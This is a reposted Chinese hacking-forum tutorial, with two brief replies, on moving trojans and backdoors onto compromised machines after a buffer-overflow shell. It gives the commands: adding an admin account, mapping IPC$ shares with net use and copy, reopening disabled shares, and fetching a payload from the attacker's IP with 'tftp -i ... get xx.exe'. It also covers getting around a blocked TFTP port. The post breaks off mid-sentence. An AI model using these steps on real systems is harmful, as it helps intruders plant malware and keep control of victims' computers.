[转载]小议溢出shell下的文件传送
信息来源:167168.kmip.net随着网上溢出程序的流行经常能在BBS和群里看到象我等"快餐黑客"抱怨说溢出之后不知道怎样传送自己的木马,后门到肉鸡上。而没有在肉鸡上留下木马或后门进一步控制不能算是完成一次成功的入侵,所以我在此归纳了一下网上流行的溢出shell下传送文件的方法,希望能够对刚入门的新手朋友带来帮助。
1.首先要说的是初学者最爱的IPC$共享传送方式了,用法很简单。先在溢出shell下建立一个管理员权限的帐号,然后在本地的CMD下与肉鸡进行连接,命令如下:
net use \IP\共享目录(后面要大$) "密码" /user:"用户名"
copy c:\file \IP\共享目录
这里再提供一个思路,大家有没有想过其实我们也可以通过肉鸡来入侵我们自己的机器同样达到传送文件的目的,只是将上传改为下载。后面的命令改为
copy \你的IP\共享目录\文件 c:\file
大家可以根据这个思路活学活用。玩过MS03-049的朋友都知道这个溢出需要139,445端口,所以只要溢出成功就直接将对方的共享目录映射到本地,这样就剩得一条条打命令了,命令如下:
net use z: \IP\共享目录
如果对方把默认共享关闭了你可以在溢出shell下用net share命令开启,另外传完文件后记得得断开连接,命令:ne use z:\IP\共享目录 /del
2.接着我们说一下很多朋友都用的tftp方式。首先你得拥有一个公网IP,然后去网上down一个tftpd32.exe,把它放到你要传送的文件的目录里运行一下就OK了。在溢出shell下执行命令:
tftp -i 你的IP get xx.exe
这样就完成了文件的传输,当管理员限制用TFTP传送文件,一般就是直接封69端口,修改默认69端口,TFTPD32.exe等TFTP服务端
是可以自己设置端口的,这里就不多讲,只不过在设置后要重新启动一次
TFTP服务端。至于客户端
在system32\drivers\etc\文件夹下有一个services文件。打开如下:
# Copyright 虽说是小议溢出shell下的文件传送
但已经挺全了。为什么shell下的ftp输入名字后就停顿呢??
郁闷!!!!!!! 还是FTP好些,TFTP有时不能成功,主要是TFPT用的是UDP协议,UDP不保证传输的可靠性是失败的主要原因,由其是在不同的网段上,或网络状况不是很好延迟大时,更是容易导致传输失败,不过UDP在视频传输上还是和TCP有一拼的
TCP就不一样了,不过TCP相对于TFTP使用上复杂一些,不过,也很容易撑握.
页:
[1]